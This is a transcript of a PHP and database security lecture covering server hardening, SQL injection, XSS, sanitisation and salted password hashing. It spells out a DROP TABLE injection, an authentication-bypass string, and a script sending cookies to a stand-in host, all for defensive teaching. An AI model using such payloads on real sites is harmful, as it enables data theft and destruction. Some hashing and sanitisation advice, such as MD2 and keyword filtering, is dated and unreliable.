In this class, we're going to look at some of the security issues that can come up with running a database on a PHP server. And we're going to look at some of the steps we can take to improve the security. Now, the first thing we need to understand is that XAMPP that we've been using, that's not designed to be used in the wild, really. That's not meant to be a production server. It's set up for learning and for developing code. So deploying your XAMPP as it comes out of the box is not appropriate. It's not safe. So that doesn't mean it's a bad product. So you should either use a different server software, one that's been designed, and to be secure, or you could beef up the security of your XAMPP. If you are buying a hosting service, it will come with a particular configuration. So you could maybe deploy your code but run it on that service. Perhaps there are technicians in the place where you work who are experts in security, or other people who are experts in security who could set you up with a good configuration. So the number of possibilities, but certainly you don't take what you've done in our classes and just put them online and bet the farm on that being okay, because it won't be. So we're going to look at some of the things we can do to improve the security. The most obvious thing you need to do is not use the default empty string password for root. Okay, so at a minimum this should be set, obviously, to something else. You would also go in and manage the different users, and certain users would only have certain privileges. So very few people or very few programs would be running, would have like root access. So those are things you can do. Obviously using the default password, like I said, bad idea. It is shocking how many internet security breaches arise from the default password problem. So let's not dismiss that completely. When we'd say we'd never be that stupid, but it happens. We saw also when we were connecting up to the database that we had to put in the code the username and password in order to connect up. Okay, so that has very sensitive information in it. So that shouldn't be included with the regular code, actually. That should go in a specific place. So you could put that connecting up code in a specific folder that is higher up in the directory structure than the rest of the code. And so then plebs running the code in the lower directories, they couldn't actually get access to that. Okay, this is explained in the book on page 120. So you can have a look there. So we're not going to do this, but it's something you should know about. So you wouldn't put your connecting up to the database code, you wouldn't put that in with everything else. You put that in a special place where it's harder to get at. The PHP server itself comes with a configuration file, and that's on the server. It's a text file, and you can open that up and change the settings. Don't try this at home, as they say on TV. You don't want to go screwing with that unless you know what you're doing. So I won't be recommending you do any of this. But to make your PHP deployment more secure, if it was going out into production, there are some things you could change that would help. You can get a list of these. You can get a list of recommended configuration options to improve security. So some of these things you would want to leave enabled, for example, while you're writing your code, while you're trying to debug your code. You want the PHP server to give you as much information as possible so you can find your problems, find your errors. But then when you are done, there may be things that you want to turn off and disable so that it makes it harder for hackers. Okay, so these are just some of them. These are some of the easier ones to understand. There's a whole bunch of these things. Some of them are very hard to understand. These are just ones we could easily get a handle on, just to give you some examples. So there's a safe mode option, and you can turn that on. And so that allows PHP scripts to access only files owned by the same user. So if you have a bunch of different directories, for example, on a server, someone could code from one directory could go and access things in the directory next door, and it's like sibling. And this would make that more difficult. Safe mode GID, that works in combination with safe mode. That's a thing you can do. I'm not sure, I forget now actually what it does, but those two things work together. Okay. Open base dir, you can set that to directory, and then PHP script can access only files in a specific directory. So you'd specify the directory that it's allowed use, and then it won't be allowed to go anywhere else. Expose PHP equals off. This prevents PHP from disclosing information about itself in the headers sent to users. Register globals equals off. So get, post, cookies and server variables are globals by default if that's set on. That's set, okay? And that makes them accessible to hackers. If you turn that off, they're more secure. It may be though that if your code is sloppy, you might find that some of it doesn't run so well if that's turned off. So you need to be careful. Display errors is a very good example of something that you would want while you are developing your code, but that you don't want then when it's deployed. So if you turn this off, it'll prevent PHP from displaying errors and warnings to the users. So that could give away some useful information to hackers. Now, when you are writing the code, you want that useful information. You want to know that something went wrong in line 37, something was expected and something was found, and you go, haha, I'm missing a semicolon. So you want all that when you're coding, but when the big day comes and your site goes live, you don't want that because it's of no value to the user. They shouldn't be seeing errors anyway, and it's very valuable to hackers. You could set log errors to on, and so errors and warnings will be written then to a log file, and so these can be viewed later. Error log equals file name, that specifies where the errors are going to go. Not all applications would require file uploads, so if you know you don't need file uploads, then you can turn that off. And so then no matter what the server is told to do, there won't be any uploading of files. Now, the next thing we want to look at is what's known as an SQL injection attack. So this is perhaps the most common kind of attack on a PHP server, and it's really quite ingenious actually, but it's also easy enough to defend against. And in this attack, the hacker puts some SQL into the input. And then when that input is displayed, when that input comes back out and is parsed by the PHP server, it's read as SQL and executed as SQL. So it means that information that was meant to be data gets misinterpreted as commands. And there's a very popular, very almost famous, I suppose, cartoon by Randall Munro that explains this. So this is little Bobby Tables. So, what does an SQL injection attack look like? Well, suppose for my name, instead of calling myself John, I called myself John, quote, close bracket, semicolon, drop table users. Okay. And if we were to put this into a table, Okay. The SQL would look like this, eh? So I was inserting this name into a table called users, and this name here would in fact be, this semicolon here would be interpreted, this quote here would be interpreted as ending this quote here, closing bracket, and then this semicolon here would be interpreted as the end of the new line. And then this code here would be a little bit of a syntax error, but the database might do a good job of actually executing that. And so this input here gets misinterpreted as this followed by this command. And so that could be very destructive. So that's a classic example of an SQL injection attack. So we put SQL in as data, and if we're not careful, if the system isn't clever enough to catch it, it will get misinterpreted as a command. Here's another example. This is, let's say here what we are doing is we're reading from a database the username and password, okay? And we're checking to see if the user ID equals what was input and the password is what was input. So we're we're pulling out of the SQL, pulling out of the table all of the rows where the user ID is the same as the user ID in the table is what was entered in the form, and the password in the table is what was entered in the form, which you would expect would come back with only one row, and would only come back with that one row if the username and password were both correct. Suppose a bad actor says his name is John, quote, or quote, blah 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 is the same as blah blah blah, semicolon, and these two dashes here would be, they signify the beginning of a comment. So now this would be read as select everything from the table user where user ID equals John, or blah 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 equals blah blah blah. And then this is just a comment, so this part doesn't get kicked in at all. So the password being correct is not relevant to the selection of the rows from the table. So this will show us this will show us everything in this table, including the password for John. So anywhere where the user ID is John, I guess there would only be the user ID would probably be unique. So it would only give us the information for this one user. But it would give us that user's information, everything in that row, including the password. So this data here is allegedly just the name, chops off this piece of the code here. So the and password is correct is gone. And blah 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 equals blah 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 is always going to be true. So or true is going to be true, and so that's going to give us the information from there. So you could see that's quite snaky, isn't it? It's quite clever. It's also quite common, so it's something you'd need to be mindful of. We can also have a problem where a script is entered as data. So let's say I said my name was script document.location equals http://baddie.com/bad.php, and I would say pass in also all of the cookies from this document. Okay. When the HTML goes to display this, right? Instead of saying hello Mr. Manning, it would say hello Mr. and then it would pass all of the information from the cookies variable, cookies super global. It would send all that off to this website here, which would be not good. So what can we do then to prevent these kinds of attacks? Well, the thing we do is we sanitize the inputs. So just as we could look at the phone number, for example, like we did before, and say that doesn't look like an Irish phone number, there's something wrong with that there, I'm not having it. You can also look at the information that's coming in and make sure it doesn't have anything in it that looks like it might be code. So for example, if someone is entering their name, well then there should really only be letters in their name, okay? Except, two exceptions I could think of. You could have an apostrophe in the name. We know lots of Irish names have apostrophes. There's O'Connors, O'Donovans, lots of O's. So O apostrophe something. So we could allow apostrophes in our names. That is kind of unfortunate. I mean, I'm sure Irish people are the bane of programmers everywhere who are trying to catch this thing here. Because of course, if you say, I mean, we'd love to say that we're not going to allow any apostrophes or no single quotes in our inputs. But then you would be ruling out lots of Irish people in their names. So you have to kind of include them, even though it's unfortunate. And then we also don't want to allow people to sneak in comments into the code and so chop off important parts of the code. But then you do have double barrel names like Jean-Luc, so you need that dash there. But certainly 2 dashes should not be allowed. Certainly a double quote should not be allowed. So we'd reject a name if it had numbers or tags or brackets. We would just say, no, we're not even putting that anywhere near the database. Don't like the look of that. That's fishy. I'm not putting that into the database. There may be scenarios where we need sort of, free form input. And what we can do there is we can convert special characters into their HTML entities. So ampersand would become ampersand AMP semicolon. This open bracket here would become ampersand LT close. So this then would never be misinterpreted as the beginning of a tag. So if I wanted to start this off here, if I was going to use that as part of beginning of a script tag, I wouldn't get away with it. Okay. So this is called sanitizing your inputs. But really the first thing you need to do when you sanitize your inputs is just decide there are certain things that shouldn't be there, and anything that has them, they're not going in. So if it's, little Bobby tables here, if, we might, this apostrophe here, this single quote here would not rule out him immediately, because like I said, we need to keep that for all the possible Irish people. Although I suppose you wouldn't have O in your first name, but it could be in your surname. But certainly no one is allowed to have a closed bracket in their surname, first name or surname. No one's allowed to have a semicolon in their name. You could even do a search for drop or any SQL. You could even look for any SQL keywords, reserved words, but that might be a bit extreme. So depending on the kind of input, you would just reject it out of hand. Okay, so sanitizing your inputs is really, really important. This is a link If you have the PDF for this, you can just click on that and it'll take you to it. Otherwise, you could type it in. But it's an article from Wired Magazine, and just goes to show that SQL injections are still there. They're still going on. The next thing now we're going to look at is how we might secure passwords. So we've seen examples where we would expect the username and password to be stored in a table, and we ask the person for their username and we ask them for their password in the form. We sanitize the inputs to make sure there's nothing dodgy being put in there, and then we would compare the username with all the usernames in the table. Ideally, it would only come back with one if the usernames would be unique. And then we would compare the password that the person has entered with the password in the table. And if the username entered matches the username in the table and the password entered matches the corresponding password in the table, well then yip-de-doo, we're happy that this person is legitimate and we would allow them to use the site. So they'd be logged in, and then we might use a session variable just to keep track of the fact that they're logged in and allow them to move around from page to page without putting in their password every single time. Now, we're always being told to use a different password for every website that we use, and there are so many websites now that really you just want to tattoo something to your forehead or something and use that. So we don't all have a unique password for every single website that we use unless we work for the government or something, and we might have one of these password managers or whatever. Typically what people have is they have a couple of passwords. One is sort of for their super secret, super important stuff. Other stuff then they just kind of have their kind of burner password where they use for, unimportant things. And then we might change our password every so often, but do we even do that? So one of the problems then that comes up is that if a single system is compromised, and we all have unique passwords for every single system, well then only that system is affected. But of course that's not what happens. We often use the same password on different systems. So we might use the same password for Facebook and for our Yahoo Mail, like anyone uses that anymore, and for, whatever. Okay? We probably wouldn't use the same password for Instagram that we would use for our bank or something. We might have a super secret password for our bank. But even so, we certainly reuse passwords between systems. So if one of the people then that we use is very sloppy and their system gets hacked, well then you might find that your username and password for that system has been compromised. And if they are very ethical, many websites are not, if they're very ethical, they will contact you and say, hey, there's been a problem. Your password for this system has been compromised. So maybe you should, we've locked your account. So we're sending you a link now in this email here where you need to have to click on this and go through and change your password and blah, blah, blah. And you think, that's great. They caught that. My password the site's been blocked and they're making me give it a new password. And obviously I'm not going to use the one I had before. But of course, that only solves the problem of this website. It doesn't solve the problem of all of the other websites in the on the internet where you've used the same password. And so this happened to me personally, in fact. I was using the same password across a bunch of different sites. One of them was compromised. It wasn't even a very important site, so it didn't really matter to me. It wasn't a big deal. Nothing happened. And they did email me. I did hear about the breach, and I did change my password anyway. But of course, all the other places where I was using the same password with the same email address, they were also compromised. So I found, for example, that my Twitter had loads of... I was following hundreds of people that I, had no interest in. So it was being used by one of these places that sells, followers. Now, so That's the problem. So if my password here on Yahoo was banana skins, and that gets compromised, not only is that website compromised, but all of the other websites where I use the same password are also compromised. So, wouldn't it be great if there was a way that we could check if the password that the person has given us to get access to the website was in fact correct, but that if the website was compromised, if the security was compromised, that it wouldn't reveal the password to anyone? Now that seems like an impossible ask. But anyway, there is a way. There's a very cool way. Okay. So the next thing we're going to look at is a hash function. A hash function maps data of an arbitrary size to data of a fixed size. So it could take any string, for example, and return, say, a value between 0 and 1,000. So an arbitrary set to a fixed size. The data from the arbitrarily large set is known as the key, and then the result of the hash function is known as the hash. So for this function that takes any string and returns a value between 0 and 1,000, the key could be colon, C-O-L-I-N, and then the hash could be, 497 or something. Now, a good hash function is one way, so that it provides no insight into the value of the key. So let me show you a particularly bad hash function. This hash function takes a string, okay, and then it gets the reverse of the string that's passed to it. It takes the reverse of the key and then uses the first 30 characters and returns that. So if the string that's passed in, if the key is smaller than 30 characters, then all you're getting is the reverse of the key as the hash. And so it's possible to take the hash and figure out what the key was. Now, for longer keys, it doesn't tell you exactly what the key was, but it still tells you way too much. So I call this DA1 hash function, or dumbass1, okay? Because this is a particularly poor hash function. Now, hash function DA2 isn't a whole lot better. But I want to show you how we would use a hash function, and I want to use a simple to understand hash function in order to show you how we do that. We can look in a little while at better hash functions. So DA2, what this hash function does is it comprises 3 digits. So no matter what string you pass it, the output will be fixed. It'll be fixed size. So it is a proper hash function. It's just not a very good one, but it is a hash function. And the first digit of the string will be the length of the key mod 10. So for example, if you give it a string that's 22 characters long, the first digit will be 2. Then the second digit is the number of vowels in the string, mod 10, so it'll always only be 1 digit. And then the third digit is the number of consonants, mod 10. So if the key is banana skins, that's my super secret password there. If the key is banana skins, then the hash is going to be 147. So if we go then to our password table, instead of storing colin.manning@cit.ie and banana skins next to it, in the table of the passwords, we would store only the hash of the password. So at some point in the past, we've asked Colin Manning for his password, but we didn't store it. We hashed it and then stored the hash. Then, next time Colin, or someone claiming to be Colin, comes back and says, my username is Colin Manning at c@he.ie and my password is whatever, whatever, we take whatever, whatever they've given us, hash it using the hash function that we've chosen, and see if the hash of the alleged password matches the hash of the stored password. And if they're a match, well, then we say, yay, that's correct. You are indeed who you say you are. So, we don't store the password, we store a hash of the password. When we are presented with a password, we hash that password and see if it matches the one that we've stored. If the two hashes match, then we assume that the two passwords were good. So in this scenario then, if this site is compromised, well, all the hacker has, this site's screwed, but all the hacker has to go somewhere else with is the hash. She doesn't have the actual password. She has only the hash of the password. And so that's not as useful because she can't go from the hash back to the password. Now, this is a particularly poor hash function, of course, because the number of possible hashes this function can generate, there's only 1,000 of them. So it's way too small to protect against a kind of a brute force attack. Also, to be honest, if you knew what the hash function was, it gives away a bit too much information. If this is 1, 4, and 7, we could hazard a guess then that this word is either 11 or 21 characters long. We could probably hazard a guess that it's got 4 or 14 vowels and 7 or 17 consonants. That's almost like a crossword puzzle, you could probably figure out what the word is if you had a dictionary of possible words. You could probably even get clues from this to make the, attack even quicker. So, like I said, this is an especially poor hash function. But I just wanted to show you how we could use the hash function in lieu of the actual password itself. We could use just the hash of the password, and that provides us some protection. Now, let's have a look at some more sensible hash functions. We're not actually going to look at the details of how each hash function works, okay? They are actually really interesting. I'm a bit of a hash function nerd. I think they're one of the really most interesting things you can find in computer science, but I'm not going to bore you with the details. So this hash function here, called MD2, if you were to give it banana skins, it would give you this output here. Now, you can actually get the output in two different ways. You can get it as kind of just a block of binary, or you can have it in hex digits here. So banana skins would give you this hash, and you can see here that this is quite a long one. It's not especially long, but you could see how to come up with another password that could hash to this by accident would take a lot of work. And more importantly, looking at the hash here, you don't get any clues as to what the key might be. There's no insight into the key there, and that's also very important. Another one just called Whirlpool could give you a much longer output here. So that's another one. There are a bunch of different kinds, and again, so to get another password that could hash to this coincidentally the same hash would be tough enough, and also there is no way to guess the password from the hash. Now, there are still some vulnerabilities, of course, with hash functions. So there are a small number of commonly used hash functions. I mean, very few developers would go away and invent their own hash function to use on their website. And also, there's actually quite a danger associated with that, because if you're a well-meaning amateur giving it a lash, you might think, well, no one knows what my hash function is going to be, so it's going to be safer than all the ones out there. But actually, the ones out there would have been quite thoroughly tested by people. You're probably safer using one of the ones off the shelf than you are coming up with your own brilliant plan. But also, a problem is that, and many people use real words as passwords. So many people will just use a regular word, and then a hacker could have a dictionary. So if we knew the person we were attacking, that they were an English language speaker, well then we could run through the dictionary of all of the words in English, or the most common words in English, run those words, each one of those, through the hash function, and then compare it with the hash function that we've hacked, that we've got access to compare it to the hash that we've got access to. And we might get a hit. And that would tell us then, aha, okay, so that's the hash function being used here. Now I know what the function is. I can narrow down my parameters, but also then I can just keep using the dictionary attack now only with that hash function. And so, there's still the possibility of a brute force attack. But there's actually a little trick, a very, very cheap and easy trick we can do to make this particular vulnerability much more work for the hacker. And really, like when it comes to defending against security attacks like this, there's no such thing as 100%, impossible to hack. But what you want to do is you want to do things that make the computing power required for a brute force attack to be exponentially, greater than it would otherwise be. So the more you can do, the more work than it is for the hacker or the hacker's machines. So there's a thing we can do when we're using hash functions that significantly increases the security. And this is called salting the key. And salt is a little bit of information that has been randomly generated that we add to the key before we send it to the hash function. So if we look here, for example, at banana skins, when we feed this into MD2, this is what comes out. I have this randomly generated salt here, okay? And if I put that in front of the key before I send it to the hash function, well then the hash is going to be very, very different. But also, if banana skins is in the hacker's dictionary of words and is trying a brute force dictionary attack, well that's not going to get a hit for this, because because the salt here has completely changed the output of the hash function. And so if the salt is randomly generated, it can make the work for the hacker all the greater, exponentially, more difficult. And typically actually what we do is we even generate a random salt for each password, and we store the salt in a table. And so then when the legitimate user comes along with his password, we look up not only the hash for the password, but we look up the salt for the password, and we combine that with the password that the user has entered, and then we send the two of them, we send the new string, the password and the salt, to the hash function, and then we compare the hash that's generated with the hash that we have stored in the table. And so that makes the system much more secure. And I guess ideally we would have the hash and the salt stored in different places, but even if that's not the case, this does add an extra layer of security. Now let's take a look here at example 33. Here I have written some code just to show you the outputs of some of the different hash functions that are available built in PHP. As I mentioned earlier, it's not necessarily a good idea to go thinking up your own hash function. So what we can do here is we can put in the key that we want to have hashed. Then we can select the hash function that we're interested in. And so here I'm selecting MD2, and then let's see what the hash for that would be. So this here is what the MD2 hash would come up with for Colin. Now, one of the signs of a good hash function actually is that if you change the key only very, very slightly, so in terms of ASCII here now, I've only gone like one character down, okay? If the key changes very, very slightly, you would hope that the hash would actually change drastically. And so if we see the MD2 hash now for this new word, you can see, look, it's completely different. Okay. I actually thought it would be more different. I don't like that it starts with the same two characters, but anyway, there you go. So you'd expect it to be quite different. So that's a sign of a good hash function, that a tiny change in the input results in a very big change in the output. Now, let's make up salt here. Let me just show you that if I was to say salt, I know, let's say XYZ and XYZ. So if we use this as the salt then, okay, and we again use MD2 here, we see that the salt is going to again change the hash drastically. It's going to have a big influence on the output of the function. Okay, and just to show you, this is the same as just putting this at the start. Now you could put the salt at the beginning of the string or at the end of it. Doesn't really matter. If you're being very good, you'd split the string open in the middle and slot the salt in somewhere. Okay, and you can see, so this is just the same. So in the way I've done this, whatever you put in the salt field here, I just put at the start of the function and send that into the hash function. So again, no change there. Some of them are longer than others. So SHA256 is a bit longer. This RipeMD, I guess, is longer again. Oh no, it's not. Okay. And so on. So there's a bunch of different kinds. Some of them have been shown now to be less secure than you would want. And so they would no longer be recommended for use in new systems. But obviously, if you have an existing system that uses one of these less secure hash functions, well, you can't just throw out the tables that you have, because of course you don't know what the original passwords are. So you can't generate new hash functions with the new and improved, good, secure hash functions. You can't generate new hashes because you don't have the original passwords. But what you could do is, in a new system, is make sure you don't use one of the old dodgy ones. This is just one here. Let's just see. So some of them are quite short, and some of them are a bit longer. So there you go. So you can have a mess around with those. I mean, really, there's not much more to see, only that some are longer than others. And I think it's worth seeing how even a small change in the inputs results in a big change in the outputs. Let's just do that there, changes to M, and we'd like to see a big change here now. And see, oops, sorry, feck. I'll do that again. I really want you to see that. Okay, so I'm going to do that again. This was Ghost Crypto. So this is with Colin, and then the same one then with Colin. And we can see that it's again very different. Okay. So that's hash functions. There are a number of them built into PHP, and you can pick from them. There's actually, I've included in the PHP code, there's a function you can use that will actually display all of the hash functions that are available to you. And you can see there's a few of them there. Okay, and if we look at the code, you can see that just the function there for using the hash functions. I'll just crank that up there. You pass in, so it's just called hash. You pass in the algorithm that you want to use, and then you pass in the key, and then this boolean here, if this is false, this is for binary, so if this is true, it'll come back with kind of a raw value. If it's false, it comes back as hex. So it's just certainly easier to display, and in general easier to use. Okay, so that's hash functions. So we've used hash functions for a very specific reason here and in a very specific way, but actually they come up in other places too. And the first place that hash functions turned up really was in data storage. And there's a very clever thing you can do with hash functions. If you want to store information in a big array, so that you can find it again later, well, one of the ways you could do that is you could just store everything in the array as it comes along. But then finding the things later would take a long time because you'd have to go item by item. Another thing you could do is you could, when you insert something into the big array, you could insist that everything is, say, in alphabetical order if they were names. And so then when you go to look for something, well, you can sort of start in the middle of the array, and then you would know whether you need to go up or down, this sort of thing. And it can be easier to find things if the array is sorted. But of course, sorting the array as you put things in can be very inefficient. So this is a very clever thing you can do with using hash functions, where you can put a string into the hash function, and then the hash function will tell you where you should put it in the array, or where you should try to put it in the array anyway. And so next time you come back then to find something in the array, you just plug the value into the hash function, and the hash function tells you where it should be. So this was the first real use of hash functions, and this was the reason they were devised. And they're still used for this today. This is a very clever thing. I think it's one of the cleverest things in computer science, actually, hash functions. It's just so clever. I, disgusted I didn't think of it myself, but it was been, done long before I was born. And it's a very, very clever use of hash functions. Another place hash functions come up is cryptography. And you can see how it's useful. You can check that one person has something the same as you without you actually telling them what you have. That's this kind of all fits in there. And actually, another place we see hash functions now all the time is in the blockchain, would you believe? The blockchain uses hash functions, and it makes people use the same hash function on various values over and over and over and over again until they get a hit for something. And once they've got that, then it's very easy for other people to check that actually they did do that, because they can just plug the value in and see that, oh yeah, that hash function gives you that. Oh yeah, well done, you worked that out, good for you. So they can actually check that the person did that without them having to do it all themselves all over again. So, you see them in lots of different places. Now, depending on the application, you might want to choose one hash function over another. Some hash functions are very fast and efficient. So if you're doing data storage, obviously the fastest, most efficient, cheapest hash function that's good, the cheapest good one is the best one. But obviously for cryptography and things like blockchain and stuff, you want slow, complicated hash functions, because you want calculating the hash to be something that consumes lots of resources. But they're very versatile little creatures, and they keep popping up all over the place in computer science. There we go. That's hash functions for you.